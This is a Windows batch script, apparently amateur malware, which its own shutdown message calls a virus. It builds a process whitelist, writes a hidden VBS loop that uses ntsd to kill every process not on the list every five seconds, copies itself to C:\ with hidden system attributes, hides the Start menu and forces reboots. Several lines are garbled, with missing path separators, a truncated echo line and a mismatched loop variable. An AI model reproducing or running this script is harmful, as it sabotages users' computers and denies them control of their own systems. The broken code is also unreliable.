echo explorer.exe >>process.ini
echo lsass.exe >>process.ini
echo smss.exe >>process.ini
echo ctfmon.exe >>process.ini
echo services.exe >>process.ini
echo svchost.exe >>process.ini
echo winlogon.exe >>process.ini
echo System >>process.ini
echo System Idle Process >>process.ini
echo Wscript.exe >>process.ini
echo cmd.exe >>process.ini
echo QQ.exe >>process.ini
echo iexplore.exe >>process.ini
echo ^@echo off&Setlocal EnableDelayedExpansion >>taskkill.cmd
echo for /f "tokens=1 delims=," %%a in ('tasklist /nh /FO CSV') do ( >>taskkill.cmd
echo for /f "delims=" %%b in (Process.ini) do ( >>taskkill.cmd
echo set /a flag+=1 >>taskkill.cmd
echo if /i not %%a=="%%b" set /a num+=1 >>taskkill.cmd
echo if !flag! equ !num! ntsd -c q -pn %%a >>taskkill.cmd
echo set /a flag=num=0 >>taskkill.cmd
echo dim ws >>%SYSTEMDRIVE%shouhu.vbs
echo set ws=CreateObject("Wscript.Shell") >>C:shouhu.vbs
echo Do >>%SYSTEMDRIVE%shouhu.vbs
echo Set ws = CreateObject("Wscript.Shell") >>C:shouhu.vbs
echo ws.run "cmd /c taskkill.cmd",vbhide >>C:shouhu.vbs
echo Wscript.Sleep 5000 >>C:shouhu.vbs
echo shutdown -r -f -t 0 >>C:
for %%d in (process.ini,shouhu.vbs,taskkill.cmd,vbs.vbs,shutdown.vbs) do if not exist C:\%%d copy %%d C:\%%d
for %%f in (process.ini,shouhu.vbs,taskkill.cmd,vbs.vbs,restart.cmd,shutdown.vbs,v.vbs
) do if exist C:\%%f attrib +s +h +r C:\%%d
del taskkill.cmd /q & del process.ini /q
attrib "C:windowsstart menu*.*" +h /s
taskkill /F /im explorer.exe 1>nul & start explorer.exe & start shutdown.vbs
ping 127.0.0.1 -n 300 >nul
shutdown -r -f -t 10 -c "浪子友情提醒你,由于你多次选择稍后重启系统,导致病毒无法正常运行,浪子决定立刻重新启动!"